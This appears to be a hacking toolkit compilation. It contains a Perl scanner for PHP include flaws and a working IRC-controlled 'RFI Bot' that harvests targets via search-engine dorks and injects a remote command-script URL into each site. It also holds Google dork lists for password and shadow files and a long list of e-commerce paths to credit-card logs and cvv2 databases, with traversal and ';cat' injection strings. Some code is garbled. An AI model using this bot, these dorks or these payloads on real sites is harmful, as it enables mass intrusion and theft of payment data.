if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files5 = <$input/*/*/*/*/*>;
foreach $file (@files5) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files6 = <$input/*/*/*/*/*/*>;
foreach $file (@files6) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files7 = <$input/*/*/*/*/*/*/*>;
foreach $file (@files7) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}


print "Done! Check results.html for the found inclusions!";

RFI Bot - Scan created by PERL







#!/usr/bin/perl
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###############CONFIGURATION###################
my $processo = "/usr/local/apache/bin/nscan -DSSL";
my $printcmd="http://geocities.com/alexlz_19/kewog.txt?"; #<---- Change this for your CMD
my $server="irc.server.org";
my $porta="6667";
my $nick="BOT-NAME";
my $chan="#channel";
###############END OF CONFIGURATION############

my $verbot = "2.0";
my $cmd="http://www.youthsoroca.md/php-nuke/foto/safe.jpg"; #Never change this
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Google 8 * : Google : google@google.it : Google :Google\r\n";
print $sk "JOIN $chan\r\n";
print $sk "PRIVMSG $chan :1,0[7S1,0can-Bot] Scan is 3ON1 : 12!scan \r\n";

while($line = <$sk>){

$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}

if ($line=~ /PRIVMSG $chan :.deletebot/){
stampa($sk, "QUIT");
}

if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Started: $bug - Dork: $dork Engine: Google ");
stampa($sk, "PRIVMSG $chan :1,0[7G1,0oogle] Scanning now...");
my @glist=&google($dork);
stampa($sk, "PRIVMSG $chan :1,0[7M1,0sn] Scanning now...");
my @mlist=&msn($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0ltavista] Scanning now...");
my @alist=&altavista($dork);
stampa($sk, "PRIVMSG $chan :1,0[7L1,0ibero] Scanning now...");
my @llist=&libero($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0lltheweb] Scanning now...");
my @allist=&alltheweb($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0sk] Scanning now...");
my @asklist=&ask($dork);
stampa($sk, "PRIVMSG $chan :1,0[7U1,0ol] Scanning now...");
my @uollist=&uol($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0ol] Scanning now...");
my @aollist=&aol($dork);
push(my @tot, @glist, @ylist, @mlist, @alist, @llist, @allist,@asklist,@uollist,@aollist);
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Total results: ".scalar(@tot)." Sites!");
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Cleaned results: ".scalar(@puliti)." Sites!");
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Exploting started! ");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
}
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug.$printcmd."?";
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /31337/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :1,0[7S1afe4OFF1] 1,0[7S1ys4 ".$type."1] 1,0[7F1ree4 ".$space." 1] $print ");
stampa($sk, "PRIVMSG $chan :1,0[7I1nformation1]4 $ker  ");
checksafemode("$print");}}
elsif($re =~ /31337/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :1,0[7S1afe3ON1] 1,0[7S1ys3 ".$type."1] 1,0[7F1ree3 ".$space." 1] $print ");
stampa($sk, "PRIVMSG $chan :1,0[7I1nformation1]3 $ker  ");
checksafemode("$print");}}
}}}
exit;
}}}


sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}

sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $type;
my $space;
my $ker;
my $str;
while($Res=~m/
OSTYPE:(.+?)\
/g){
$type=$1;
}
while($Res=~m/
Kernel:(.+?)\
/g){
$ker=$1;
}
while($Res=~m/
Free:(.+?)\
/g){
$space=$1;
}
$str=$type.",".$space.",".$ker;
return $str;
}

sub aol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=100;$b++){
my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
my $Res=query($AoL);
while($Res =~ m/

http:\/\/(.+?)\<\/p>/g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=100){
my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub yahoo(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=100){
my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
my $Res=query($Ya);
while($Res =~ m/\(.+?)\<\/em>/g){
my $k=$1;
$k=~s///g;
$k=~s/<\/b>//g;
$k=~s///g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub altavista(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while($Res=~m/(.+?)\//g){
if($1 !~ /altavista/){
my $k=$1;
$k=~s/$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub msn(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
my $Res=query($MsN);
while($Res =~ m/\"]*)\//g){
if($1 !~ /msn|live/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub libero(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0,$pg=0; $i<=1000; $i+=10,$pg++)
{
my $Lib=("http://arianna.libero.it/search/abin/integrata.cgi?s=1&pag=".$pg."&start=".$i."&query=".key($key));
my $Res=query($Lib);
while($Res =~ m/\"]*)\//g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
my $Res=query($Ask);
while($Res=~m/my $k=$3;
$k=~s/[\"\ ]//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub alltheweb()
{
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=100)
{
my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $Res=query($all);
while($Res =~ m/http:\/\/(.+?)\<\/span>/g){
my $k=$1;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub uol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
my $Res=query($UoL);
while($Res =~ m/\"]*)/g){
my $k=$1;
if($k!~/busca|uol|yahoo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}


sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}

sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}

sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}

sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}


sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}

Finding PHP Vulnerabilities With Google Code Search Dangerous keywords in Google Search : it's keywords so dangerous...try it Index of /admin" "Index of /password" "Index of /mail" "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess index of ftp +.mdb allinurl:/cgi-bin/ +mailto administrators.pwd.index authors.pwd.index service.pwd.index filetype:config web gobal.asax index allintitle: "index of/admin" allintitle: "index of/root" allintitle: sensitive filetype:doc allintitle: restricted filetype :mail allintitle: restricted filetype:doc site:gov inurlasswd filetype:txt inurl:admin filetype:db inurl:iisadmin inurl:"auth_user_file.txt" inurl:"wwwroot/*." top secret site:mil confidential site:mil allinurl: winnt/system32/ (get cmd.exe) allinurl:/bash_history intitle:"Index of" .sh_history intitle:"Index of" .bash_history intitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd intitle:"index of" members OR accounts intitle:"index of" user_carts OR user_cart ALTERNATIVE INPUTS==================== _vti_inf.html service.pwd users.pwd authors.pwd administrators.pwd shtml.dll shtml.exe fpcount.exe default.asp showcode.asp sendmail.cfm getFile.cfm imagemap.exe test.bat msadcs.dll htimage.exe counter.exe browser.inc hello.bat default.asp dvwssr.dll cart32.exe add.exe index.jsp SessionServlet shtml.dll index.cfm page.cfm shtml.exe web_store.cgi shop.cgi upload.asp default.asp pbserver.dll phf test-cgi finger Count.cgi jj php.cgi php nph-test-cgi handler webdist.cgi webgais websendmail faxsurvey htmlscript perl.exe wwwboard.pl www-sql view-source campas aglimpse glimpse man.sh AT-admin.cgi AT-generate.cgi filemail.pl maillist.pl info2www files.pl bnbform.cgi survey.cgi classifieds.cgi wrap cgiwrap edit.pl perl names.nsf webgais dumpenv.pl test.cgi submit.cgi guestbook.cgi guestbook.pl cachemgr.cgi responder.cgi perlshop.cgi query w3-msql plusmail htsearch infosrch.cgi publisher ultraboard.cgi db.cgi formmail.cgi allmanage.pl ssi adpassword.txt redirect.cgi cvsweb.cgi login.jsp dbconnect.inc admin htgrep wais.pl amadmin.pl subscribe.pl news.cgi auctionweaver.pl .htpasswd acid_main.php access.log log.htm log.html log.txt logfile logfile.htm logfile.html logfile.txt logger.html stat.htm stats.htm stats.html stats.txt webaccess.htm wwwstats.html source.asp perl mailto.cgi YaBB.pl mailform.pl cached_feed.cgi global.cgi Search.pl build.cgi common.php show global.inc ad.cgi WSFTP.LOG index.html~ index.php~ index.html.bak index.php.bak print.cgi register.cgi webdriver bbs_forum.cgi mysql.class sendmail.inc CrazyWWWBoard.cgi search.pl way-board.cgi webpage.cgi pwd.dat adcycle post-query help.cgi /robots.txt /admin.mdb /shopping.mdb /arg; /stats/styles.css /statshelp.htm /favicon.ico /stats/admin.mdb /shopdbtest.asp /cgi-bin/test.cgi /cgi-bin/test.pl /cgi-bin/env.cgi /photos/protest/styles.css http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi /cgi-bin/whereami.cgi /shopping400.mdb /cgi/test.cgi /cgi-bin/test2.pl /photos/protest/kingmarch_02.html /chevy/index.htm /cgi-bin/glocation.cgi /cgi-bin/test2.cgi /ccbill/glocation.cgi /cgi-bin/styles.css /shopping350.mdb /cgi-bin/shopper.cgi /shopadmin.asp /news_2003-02-27.htm /cgi-bin/whois.cgi 3 /cgi-bin/calendar.pl 3 /cgi-bin/calendar/calendar.pl 3 /cgibin/styles.css 3 /venem.htm 2 /stats/www.newbauersflowers.com/stats/04-refers.htm 2 /cgi-bin/where.pl 2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG 2 /cgibin/recon.cgi 2 /cgibin/test.cgi 2 /WebShop/templates/styles.css 2 /stats/shopping350.mdb 2 /cgi-bin/mailform.cgi 2 /cgi-bin/recon.cgi 2 /chevy 2 /cgi-bin/servinfo.cgi 2 /acart2_0.mdb 2 /cgi-bin/where.cgi 2 /chevy/ 2 /stats/www.savethemall.net/stats/19-refers.htm 2 /ccbill/secure/ccbill.log 2 /cgi/recon.cgi 2 /stats/www.gregoryflynn.com/chevy 2 /ibill/glocation.cgi 2 /ccbill/whereami.cgi 2 /ibill/whereami.cgi 2 /apps_trial.htm 2 /cgi-bin/lancelot/recon.cgi 2 /cgi-bin/DCShop/Orders/styles.css 1 /cgi-bin/htmanage.cgi 1 /stats/www.tysons.net/stats/05-refers.htm 1 /cgi-bin/mastergate/add.cgi 1 /cgi-bin/openjournal.cgi 1 /cgi-bin/calendar/calendar_admin.pl 1 /cgibin/ibill/count.cgi 1 /cgi-bin/nbmember2.cgi 1 /cgi-bin/mastergate/count.cgi 1 /cgi-bin/mastergate/accountcreate.cgi 1 /cgi-bin/ibill/accountcreate.cgi 1 /cgibin/MasterGate2/count.cgi 1 /cgi-bin/amadmin.pl 1 /cgibin/mailform.cgi 1 /cgibin/mastergate/count.cgi 1 /cgibin/harvestor.cgi 1 /cgibin/igate/count.cgi 1 /WebShop 1 /shopdisplaycategories.asp 1 /cgi-bin/DCShop/Orders/orders.txt 1 /cgi-bill/revshare/joinpage.cgi 1 /stats/www.gregoryflynn.com/stats/19-refers.htm 1 /cgi-local/DCShop/auth_data/styles.css 1 /cgi-bin/add-passwd.cgi 1 /cgi-bin/MasterGate/count.cgi 1 /apps_shop.htm%20/comersus/database/comersus.mdb 1 /data/verotellog.txt 1 /epwd/ws_ftp.log 1 /stats/www.dialacure.com/stats/16-refers.htm 1 /cgi/MasterGate2/count.cgi 1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019 1 /wwii/styles.css 1 /cgi-bin/admin.mdb 1 /stats/www.gregoryflynn.com/stats/31-refers.htm 1 /cgi-bin/ibill-tools/count.cgi 1 /WebShop/templates/cc.txt 1 /cgibin/ibill/accountcreate.cgi 1 /cgi-bin/count.cgi 1 /cgi-local/DCShop/auth_data/auth_user_file.txt 1 /cgi/mastergate/count.cgi 1 /cgi-bin/EuroDebit/addusr.pl 1 /cgi-bin/dbm-passwd.cgi 1 /cgi/igate/accountcreate.cgi 1 /cgi-bin/store/Log_files/your_order.log store/log_files/your_order.log /cg i-bin/DCShop/Orders/orders.txt /vpasp/shopdbtest.asp /orders/checks.txt /WebShop/logs /ccbill/secure/ccbill.log /scripts/cart32.exe / cvv2.txt /cart/shopdbtest.asp /cgi-win/cart.pl /shopdbtest.asp /WebShop/logs/cc.txt /cgi-local/cart.pl /PDG_Cart/order.log /config/---.mdb /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml /or ders/orders.txt /cgis/cart.pl /webcart/carts /cgi-bin/cart32.exe/cart32clientlist /cgi/cart.pl /comersus/database/comersus.mdb /WebShop/temp lates/cc.txt /Admin_files/order.log /orders/mountain.cfg /cgi-sys/cart.pl /scripts/cart.pl /htbin/cart.pl /productcart/database/EIPC.mdb /shoponline/fpdb/shop.mdb /config/datasources/myorder.mdb /PDG_Cart/shopper.conf /shopping/database/metacart.mdb /bin/cart.pl /cgi-bin/cart32.ini /database/comersus.mdb /cgi-local/medstore/loadpage.cgi?user_id= id&file=data/orders.txt /cgi-bin/store/Admin_files/myorderlog.txt /cgi-bin/orders.txt /cgi-bin/store/Admin_files/your_order.log /test/test.txt /fpdb/shop.mdb /cgibin/shop/orders/orders.txt /shopadmin1.asp /cgi-bin/shop.cgi /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi /cgi-bin/PDG_cart/card.txt /shopper.cgi?preadd=action&key=PROFA&template=order1.log /store/shopdbtest.asp /log_files/yo ur_order.log /_database/expire.mdb /HyperStat/stat_what.log /cgi bin/DCShop/auth_data/auth_user_file.txt /htbin/orders/orders.txt /SHOP/shopadmin.asp /index.cgi?page=../admin/files/order.log /vpshop/shopadmin.asp /webcart/config /PDG/order.txt /cgi-bin/shopper.cgi /orders/order.log /orders/db/zzzbizorders.log.html /easylog/easylog.html /cgi-bin/store/Log_files/your_order.log /cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb /comersus_message.asp? /orders/import.txt /htbin/DCShop/auth_data/auth_user_file.txt /admin /html_lib.pl /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt /cgi-bin/DCShop/auth_data/auth_user_file.txt /cgi-bin /shop.pl/page=;cat%20shop.pl /cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log /HBill/htpasswd /bin/shop/auth_data/auth_user_file.txt /cgi-bin /cs/shopdbtest.asp /mysql/shopping.mdb /Catalog/config/datasources/Products.mdb /trafficlog /cgi/orders/orders.txt /cgi-local/PDG_Cart/shopper.conf /store/cgi-bin/---.mdb /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log /cgi-bin/mc.txt /cgi-bin/mall2000.cgi /cgi-win /DCShop/auth_data/auth_user_file.txt /cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log /store/commerce.cgi /scripts/ shop/orders/orders.txt /product/shopping350.mdb /super_stats/access_logs /cgi-local/orders/orders.txt / cgi-bin/PDG_Cart/mc.txt /cgibin/cart32.exe /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log /cgibin/password.txt /Catalog/cart/carttrial.dat /catalog/Admin /Admin.asp /ecommerce/admin/user/admin.asp /data/productcart/database/EIPC.mdb /store/admin_files/commerce_user_lib.pl /cgi-bin/store/index.cgi /paynet.txt /config/datasources/store/billing.mdb /_database/shopping350.mdb /cgi-bin/shopper.exe?search /cgi/shop.pl/page=;cat%20shop.pl /cgi-bin /store/Admin_files/orders.txt /cgi-bin/store/commerce_user_lib.pl /cgi-sys/pagelog.cgi /cgi-sys/shop.pl/ page=;cat%20shop.pl /scripts/weblog /fpdb/shopping400.mdb /htbin/shop/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log /mall_log_files/ /cgi-bin/perlshop.cgi /tienda/shopdbtest.asp /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log /WebShop/logs/ck.log /fpdb/shopping300.mdb /mysql/store.mdb /cgi-bin/store/Admin_files/commerce_user_lib.pl /config.dat /order/order.log /commerce_user_lib.pl /Admin_files/AuthorizeNet_user_lib.pl /cvv2.asp /cgi-bin/cart32/CART32-order.txt /wwwlog /cool-logs/mlog.html /cgi-bin /pass/merchant.cgi.log /cgi-local/pagelog.cgi /cgi-bin/pagelog.cgi /cgi-bin/orders/cc.txt /cgis/shop/orders/orders.txt /admin /admin_conf.pl /cgi-bin/pdg_cart/order.log /cgi/PDG_Cart/order.log /Admin_files/ccelog.txt /cgi-bin/orders/mc.txt /cgi/cart32.exe /ecommerce/admin /admin.asp /scripts/DCShop/auth_data/auth_user_file.txt /Catalog/config/---.mdb /ecommerce/admin/shopdbtest.asp /mysql/mystore.mdb /cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log /cgi-bin/Count.cgi?df=callcard.dat /logfiles/ /shopping/shopping350.mdb /admin/configuration.pl /cgis/DCShop/auth_data/auth_user_file.txt /cgis/cart32.exe / cgi-bin/dcshop.cgi /cgi-win/shop/auth_data/auth_user_file.txt /shopping400.mdb /HBill/config /cgi-bin/shop/index.cgi?page=../admin/files/order.log /search=action&keywords=GSD%20&template=order.log /WebCart/orders.txt /PDG_Cart/ authorizenets.txt /cgi-bin/AnyForm2 /~gcw/cgi-bin/Count.cgi?df=callcard.dat /cgi-bin/PDG_Cart/order.log /expire.mdb /logger/ /webcart-lite/orders/im port.txt /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl /cgi-bin/PDG_Cart/shopper.conf /cgi-bin/cart32.exe /dc/orders/orders.txt /cgi-local/DCShop/orders/orders. txt /shop.pl/page=shop.cfg /cgi-local/cart32.exe /cgi-win/pagelog.cgi /cgi-win /shop/orders/orders.txt /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv /cgi-sys/DCShop/auth_data/auth_user_file.txt / cgi-bin/www-sql;;; /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log /scripts/orders/orders.txt /cgi-loca l/shop.pl/shop.cfg /search=action&keywords=cwtb%20&template=expire.mdb /php/mylog.phtml /config/datasources/shopping.mdb /php-coolfile/action.php?action=edit&file=config.php /cgi-bin/ezmall2000/mall2000.cgi /cgi/DCShop/orders/orders.txt /cgi-local/ shop.pl /cgis/DCShop/orders/orders.txt /product/shopdbtest.asp / ASP/cart/database/metacart.mdb /cgi-bin/cgi-lib.pl /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html /search=action&keywords=cwtb%20&template=order.log /mysql/expire.mdb /scripts/sh op/auth_data/auth_user_file.txt /cgi-bin/cart32/whatever-OUTPUT.txt /Shopping%20Cart/shopdbtest.asp /cgi/shop/auth_data/auth_user_file.txt /sh op/shopping350.mdb /cgi-bin/store/Authorize_Net.pl /scripts/DCShop/orders/orders.txt /store/l og_files/commerce_user_lib.pl /shopping/shopadmin.asp /cgi-bin/orderlog.txt /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CO DE=PHOLD;;; /cool-logs/mylog.html /cgibin/shop.pl/page=;cat%20shop.pl /htbin /shop.pl/page=;cat%20shop.pl /cgi-win/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt /SHOP/shopdbtest.asp /cgi/pagelog.c gi /php/mlog.phtml /cgi-bin/shop/apdproducts.mdb /htbin/shop/auth_data/auth_user_file.txt /server%20logfile;;; /database/ metacart.mdb /cgi-local/shop/orders/orders.txt /dcshop/auth_data/auth_user_file.txt /log/ /cgi-bin/shop.cgi/page=../../../../etc/hosts /scripts/c32web.exe /cgis/ord ers/orders.txt /logfile/ /shop_db/shopping.mdb /shopping.mdb /weblog/ /config/datasources/cvv2.mdb /cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin /PDG_Cart/order.log /cgi-sys/shop/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log /cgi-win/cart32.exe /cgi-bin/loadpage.cgi /dcshop/orders/orders.txt /shop/show.php?q=' /cgib in/orders/orders.txt /bin/pagelog.cgi /cgi-bin/shop/orders/orders.txt /_database/shopdbtest.asp /cgibin /pagelog.cgi /cgi-local/shop.pl/page=;cat%20shop.pl /shop/search .php?q=' /cgi-sys/cart32.exe /order13.txt /weblogs/ /orderb/sh op.mdb /config/datasources/order.mdb /store/cgi-bin/Admin_files/Store_user_lib.pl /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC /Orders /order.log /logs/access_log /config/datasources/your_order.mdb /ecommerce/admin/admin/admin.asp /mall_log_files/order.log /bin/cart32.exe /htbin/DCShop/orders/orders.txt /Admin_files/Authorize_Net.pl /logging/ /database/ /cgi-sys/shop/auth_data/auth_user_file.txt /bin/shop.pl/page=;cat%20shop.pl /cgi-local/shop/auth_data/auth_user_fil e.txt /cgi-local/DCShop/auth_data/auth_user_file.txt /cgi-bin/shop/auth_data/auth_user_file.txt /cgi-win /DCShop/orders/orders.txt /store/Admin_files/Authorize_Net.pl /cart/cart.asp /bin/DCShop/orders/orders.txt /scripts/pagelog.cgi /cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb /webcart/config/clients.txt /dc/auth_data/auth_user_file.txt /cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt /bin /orders/orders.txt /cgi-bin/Web_Store/web_store.cgi /cgis/pagelog.cgi /cgi-bin /orders/orders.txt /merchant/shopdbtest.asp /cgi-local/shop.pl/page=shop.cfg /cgis/shop.pl/pa ge=;cat%20shop.pl /index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd /cg-bin/ /cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG /cgi-bin /DCShop/Auth_data/auth_user_file.txt /ecommerce/admin/adminLeft/admin.asp /webcart/orders/import.txt /cgibin/shop/auth_data/auth_user_file.txt /productcart/database/eipc.mdb /mysql/cheersoundchdb.mdb /cgi-bin/order.txt /scripts/iisadmin/tools/mkilog.exe /ProductCart/database/EIPC.mdb /databases/ /cg i-sys/orders/orders.txt /cgi/DCShop/auth_data/auth_user_file.txt / database/EIPC.mdb //cgi-bin/orders.txt /vpasp-shopcart/shopdbtest.asp /cgi-bin /shopper.exe?preadd=action&key=bajk390ss&template=order.log /cgi-bin/DCShop/orders/orders.txt /mysql/shopping350.mdb /_database/shopping.mdb /htbin/cart32.exe /PDG_Cart/shopper.config /cgis/shop/auth_data/auth_user_file.txt /shop/SHOPDBTEST.ASP /bin/shop/orders/orders.txt //cgi-local/medstore/loadpage.cgi?user_id=id &file=data/orders.txt /cgi-bin/store/dcshop_admin.cgi /_database/shopping400.mdb /scripts/shop.pl/page=;cat%20shop.pl /cgibin/PDG_Cart/shopper.conf /cgibin/DCShop/orders/orders.txt /cgibin/%20awstats.pl?output=keywords /cgi/shop/orders/orders.txt /cgi-bin /cart32_old.exe /webshop/templates/cc.txt /webcart/orders /pro ductcart/database/shop.mdb /index.php?link=order /cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd /shopping/shopdisplayproducts.asp? /ccbill-local.cgi /bin/DCShop/auth_data/auth_user_file.txt /cgi-bin /c32web.exe/CheckError?error=53 /server/admin_files/commerce_user_lib.pl /shopping/shopdisplayproducts.asp?id=1&cat=order.log /mail.cgi /cgibin/admin_files/ /cgi-bin/mail/form.cgi /cgibin/shopping/database/metacart.mdb /globill/ver12otellog.txt /cgi-bin/shopping.mdb /shopping%20.mdb /cgi-bin/mail.cgi /cgi-bin/FORM.cgi 